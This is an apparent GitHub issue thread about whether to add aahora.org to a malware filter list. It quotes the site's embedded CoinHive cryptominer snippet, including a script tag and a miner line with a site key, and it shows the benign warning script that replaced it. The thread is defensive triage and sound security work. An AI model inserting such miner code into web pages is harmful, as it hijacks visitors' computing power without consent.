Closed iam-py-test closed 3 years ago
It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?
https://www.facebook.com/fundacionahora/
It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?
https://www.facebook.com/fundacionahora/
I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says. Maybe it got bought by someone else and is no longer malware, or is infected? @DandelionSprout what do you think?
Which part of the site is malicious? Is there a specific page?
The scans flagged the homepage as having malware but most reported the host as malware too
Looking at the code, it seems like maybe it was flagged because of this:
var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});
Or this
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?
It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js
was replaced with another script:
// Credit to https://w3bits.com/javascript-modal/
let createModal = (modalContent) => {
let modal = document.createElement('div'),
modalStyle = document.createElement('style'),
modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; } .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
theBody = document.getElementsByTagName('body')[0],
theHead = document.getElementsByTagName('head')[0];
// Add content and attributes to the modal
modal.setAttribute('class', 'js-modal');
modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
theBody.appendChild(modal);
modalClose = document.querySelector('#js_modal_close');
// Add the modal styles dynamically
if(modalStyle.styleSheet){
modalStyle.styleSheet.cssText = modalCSS;
} else {
modalStyle.appendChild(document.createTextNode(modalCSS));
}
theHead.appendChild(modalStyle);
// Close the modal on button-click
if(modalClose) {
modalClose.addEventListener('click', function() {
modal.remove();
modalStyle.remove();
});
}
}
// Show it up when loading starts
window.addEventListener('load', function() {
/* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});
Closing issue
Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub E-mail notifications with them are themselves CoinHive
viruses. 😅
The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive
on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/
As such, I at least presume that there's no immediate need to add aahora.org
to my list.
The site seems to be quasi-safe after Troy Hunt was able to deactivate
CoinHive
on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/As such, I at least presume that there's no immediate need to add
aahora.org
to my list.
Yes. I am sorry for the error; I did not realize that
Which entry/entries are you submitting?
aahora.org$all
Which things do they block, hide, or unbreak?
Malware. See these for more information: https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection https://www.fortiguard.com/webfilter?q=aahora.org https://safeweb.norton.com/report/show?url=aahora.org https://www.urlvoid.com/scan/aahora.org/ https://quttera.com/detailed_report/aahora.org https://sitecheck.sucuri.net/results/aahora.org https://github.com/iam-py-test/my_filters_001/commit/b0b68fbd76522683cad733ee03f90d057e2b55eb https://quttera.com/detailed_report/coin-hive.com https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection https://www.virustotal.com/gui/domain/aahora.org/detection https://www.virustotal.com/gui/domain/www.aahora.org/detection https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection https://www.scumware.org/search.php (Complete the captcha and enter
aahora.org
to get results; strangely does not allow report to be linked)The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt
Which of my lists are you submitting it to?
Antimalware
Which adblocker(s) and version did you use when writing and testing the entries?
Other(s):
Adblocker version(s): uBlock Origin development build v1.35.3b7
Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.
(Optional) Which browser(s) and version did you use?
Edge Version 91.0.864.37